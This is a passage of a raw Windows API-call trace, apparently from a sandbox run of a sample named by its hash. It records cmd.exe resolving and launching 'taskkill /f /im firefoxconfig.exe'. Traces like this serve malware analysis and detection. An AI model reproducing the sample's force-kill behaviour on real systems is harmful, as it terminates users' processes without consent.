lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0180.347] GetProcessHeap () returned 0x610000 [0180.347] RtlFreeHeap (HeapHandle=0x610000, Flags=0x0, BaseAddress=0x61a798) returned 1 [0180.347] GetEnvironmentStringsW () returned 0x617cc8* [0180.347] GetProcessHeap () returned 0x610000 [0180.347] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xa76) returned 0x619d58 [0180.347] FreeEnvironmentStringsA (penv="=") returned 1 [0180.347] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0180.348] GetProcessHeap () returned 0x610000 [0180.348] RtlFreeHeap (HeapHandle=0x610000, Flags=0x0, BaseAddress=0x6105c8) returned 1 [0180.348] GetProcessHeap () returned 0x610000 [0180.348] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x400e) returned 0x61bc58 [0180.349] GetProcessHeap () returned 0x610000 [0180.349] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x56) returned 0x61a7d8 [0180.349] GetProcessHeap () returned 0x610000 [0180.349] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4008) returned 0x61fc70 [0180.349] GetProcessHeap () returned 0x610000 [0180.349] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4008) returned 0x623c80 [0180.351] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0180.351] GetProcessHeap () returned 0x610000 [0180.351] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x418) returned 0x61a838 [0180.351] SetErrorMode (uMode=0x0) returned 0x8003 [0180.351] SetErrorMode (uMode=0x1) returned 0x0 [0180.351] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x61a840, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0180.351] SetErrorMode (uMode=0x8003) returned 0x1 [0180.351] GetProcessHeap () returned 0x610000 [0180.351] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x61a838, Size=0x88) returned 0x61a838 [0180.351] GetProcessHeap () returned 0x610000 [0180.352] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x61a838) returned 0x88 [0180.352] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0180.352] GetProcessHeap () returned 0x610000 [0180.352] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x62) returned 0x61a8c8 [0180.352] GetProcessHeap () returned 0x610000 [0180.352] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xb8) returned 0x61a938 [0180.352] GetProcessHeap () returned 0x610000 [0180.352] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x61a938, Size=0x62) returned 0x61a938 [0180.352] GetProcessHeap () returned 0x610000 [0180.352] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x61a938) returned 0x62 [0180.352] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0180.352] GetProcessHeap () returned 0x610000 [0180.352] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xe0) returned 0x61a9a8 [0180.356] GetProcessHeap () returned 0x610000 [0180.356] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x61a9a8, Size=0x76) returned 0x61a9a8 [0180.356] GetProcessHeap () returned 0x610000 [0180.356] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x61a9a8) returned 0x76 [0180.356] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0180.356] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im firefoxconfig.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0180.357] GetLastError () returned 0x3 [0180.357] GetProcessHeap () returned 0x610000 [0180.357] RtlFreeHeap (HeapHandle=0x610000, Flags=0x0, BaseAddress=0x61fc70) returned 1 [0180.358] GetProcessHeap () returned 0x610000 [0180.358] RtlFreeHeap (HeapHandle=0x610000, Flags=0x0, BaseAddress=0x623c80) returned 1 [0180.358] GetProcessHeap () returned 0x610000 [0180.359] RtlFreeHeap (HeapHandle=0x610000, Flags=0x0, BaseAddress=0x61bc58) returned 1 [0180.367] GetConsoleOutputCP () returned 0x1b5 [0180.370] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0180.370] GetUserDefaultLCID () returned 0x409 [0180.371] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0180.371] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0180.371] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0180.372] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0180.372] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0180.372] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0180.372] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0180.372] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0180.372] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0180.372] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0180.372] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0180.372] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0180.372] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0180.372] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0180.372] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0180.374] GetProcessHeap () returned 0x610000 [0180.374] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x20c) returned 0x61aa70 [0180.374] GetConsoleTitleW (in: lpConsoleTitle=0x61aa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0180.375] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0180.375] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0180.375] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0180.375] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0180.376] GetProcessHeap () returned 0x610000 [0180.376] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x400a) returned 0x61bc58 [0180.376] GetProcessHeap () returned 0x610000 [0180.376] RtlFreeHeap (HeapHandle=0x610000, Flags=0x0, BaseAddress=0x61bc58) returned 1 [0180.377] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0180.377] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0180.377] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0180.377] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0180.377] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0180.377] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0180.377] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0180.377] GetProcessHeap () returned 0x610000 [0180.377] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x58) returned 0x61ac88 [0180.377] GetProcessHeap () returned 0x610000 [0180.377] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x1a) returned 0x610578 [0180.378] GetProcessHeap () returned 0x610000 [0180.378] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x3e) returned 0x61ace8 [0180.379] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0180.380] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0180.380] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0180.380] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0180.380] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0180.380] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0180.380] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0180.381] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0180.381] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0180.381] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0180.381] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0180.381] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0180.381] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0180.381] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0180.381] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0180.381] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0180.381] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0180.381] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0180.381] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0180.381] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0180.381] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0180.381] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0180.381] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0180.381] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0180.381] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0180.381] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0180.381] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0180.381] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0180.381] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0180.381] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0180.381] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0180.381] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0180.381] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0180.381] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0180.381] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0180.381] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0180.381] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0180.382] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0180.382] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0180.382] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0180.382] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0180.382] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0180.382] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0180.382] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0180.382] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0180.382] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0180.382] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0180.382] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0180.382] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0180.382] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0180.382] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0180.382] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0180.382] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0180.382] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0180.382] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0180.382] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0180.382] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0180.382] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0180.382] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0180.382] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0180.382] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0180.382] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0180.382] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0180.382] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0180.382] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0180.382] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0180.382] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0180.382] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0180.383] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0180.383] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0180.383] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0180.383] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0180.383] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0180.383] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0180.383] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0180.383] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0180.383] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0180.383] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0180.383] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0180.383] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0180.383] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0180.383] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0180.383] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0180.383] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0180.383] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0180.383] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0180.383] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0180.383] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0180.384] GetProcessHeap () returned 0x610000 [0180.384] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x210) returned 0x61ad30 [0180.384] GetProcessHeap () returned 0x610000 [0180.384] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x50) returned 0x61af48 [0180.384] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0180.384] GetProcessHeap () returned 0x610000 [0180.384] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x418) returned 0x6105c8 [0180.384] SetErrorMode (uMode=0x0) returned 0x8003 [0180.384] SetErrorMode (uMode=0x1) returned 0x0 [0180.384] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6105d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0180.384] SetErrorMode (uMode=0x8003) returned 0x1 [0180.384] GetProcessHeap () returned 0x610000 [0180.384] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x6105c8, Size=0x56) returned 0x6105c8 [0180.384] GetProcessHeap () returned 0x610000 [0180.384] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x6105c8) returned 0x56 [0180.384] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0180.384] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0180.385] GetProcessHeap () returned 0x610000 [0180.385] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x110) returned 0x61afa0 [0180.385] GetProcessHeap () returned 0x610000 [0180.385] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x218) returned 0x610628 [0180.390] GetProcessHeap () returned 0x610000 [0180.390] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x610628, Size=0x112) returned 0x610628 [0180.390] GetProcessHeap () returned 0x610000 [0180.390] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x610628) returned 0x112 [0180.390] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0180.390] GetProcessHeap () returned 0x610000 [0180.390] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xe0) returned 0x61b0b8 [0180.392] GetProcessHeap () returned 0x610000 [0180.392] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x61b0b8, Size=0x76) returned 0x61b0b8 [0180.392] GetProcessHeap () returned 0x610000 [0180.392] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x61b0b8) returned 0x76 [0180.392] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0180.392] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0180.393] GetLastError () returned 0x2 [0180.393] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0180.393] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x61b138 [0180.393] GetProcessHeap () returned 0x610000 [0180.393] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x14) returned 0x6175f0 [0180.393] FindClose (in: hFindFile=0x61b138 | out: hFindFile=0x61b138) returned 1 [0180.393] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0180.393] GetLastError () returned 0x2 [0180.393] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x61b138 [0180.394] GetProcessHeap () returned 0x610000 [0180.394] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x6175f0, Size=0x4) returned 0x61b178 [0180.394] FindClose (in: hFindFile=0x61b138 | out: hFindFile=0x61b138) returned 1 [0180.394] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0180.394] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0180.394] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0180.396] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0180.396] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0180.396] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x130, hStdOutput=0x13c, hStdError=0x140)) [0180.396] GetProcessHeap () returned 0x610000 [0180.396] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x18) returned 0x617730 [0180.396] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0180.396] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0180.396] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0180.396] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0180.396] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0180.396] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0180.396] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0180.396] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0180.396] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0180.396] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0180.396] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0180.396] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0180.396] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0180.396] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0180.397] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0180.397] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0180.397] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0180.397] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0180.397] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0180.397] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0180.397] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0180.397] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0180.397] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0180.397] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0180.397] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0180.397] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0180.397] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0180.397] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0180.397] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0180.397] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0180.397] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0180.397] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0180.397] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0180.397] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0180.397] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0180.397] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0180.397] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0180.397] GetProcessHeap () returned 0x610000 [0180.397] RtlFreeHeap (HeapHandle=0x610000, Flags=0x0, BaseAddress=0x617730) returned 1 [0180.397] GetProcessHeap () returned 0x610000 [0180.397] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xa) returned 0x61b138 [0180.397] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0180.403] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im firefoxconfig.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im firefoxconfig.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im firefoxconfig.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0xf38, dwThreadId=0x7fc)) returned 1 [0180.432] CloseHandle (hObject=0x98) returned 1 [0180.432] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0180.432] GetProcessHeap () returned 0x610000 [0180.433] RtlFreeHeap (HeapHandle=0x610000, Flags=0x0, BaseAddress=0x619d58) returned 1 [0180.433] GetEnvironmentStringsW () returned 0x619d58* [0180.434] GetProcessHeap () returned 0x610000 [0180.434] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xa76) returned 0x617cc8 [0180.434] FreeEnvironmentStringsA (penv="=") returned 1 [0180.434] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0181.634] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0181.635] CloseHandle (hObject=0x9c) returned 1 [0181.635] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0181.635] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0181.636] GetProcessHeap () returned 0x610000 [0181.636] RtlFreeHeap (HeapHandle=0x610000, Flags=0x0, BaseAddress=0x617cc8) returned 1 [0181.637] GetEnvironmentStringsW () returned 0x61b188* [0181.637] GetProcessHeap () returned 0x610000 [0181.637] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xa9c) returned 0x617cc8 [0181.637] FreeEnvironmentStringsA (penv="=") returned 1 [0181.637] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0181.637] GetProcessHeap () returned 0x610000 [0181.637] RtlFreeHeap (HeapHandle=0x610000, Flags=0x0, BaseAddress=0x617cc8) returned 1 [0181.637] GetEnvironmentStringsW () returned 0x61b188* [0181.637] GetProcessHeap () returned 0x610000 [0181.637] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xa9c) returned 0x617cc8 [0181.637] FreeEnvironmentStringsA (penv="=") returned 1 [0181.637] GetProcessHeap () returned 0x610000 [0181.637] RtlFreeHeap (HeapHandle=0x610000, Flags=0x0, BaseAddress=0x61b138) returned 1 [0181.637] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0181.637] _get_osfhandle (_FileHandle=1) returned 0x13c [0181.637] SetConsoleMode (hConsoleHandle=0x13c, dwMode=0x0) returned 0 [0181.638] _get_osfhandle (_FileHandle=1) returned 0x13c [0181.638] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0xf3f40c | out: 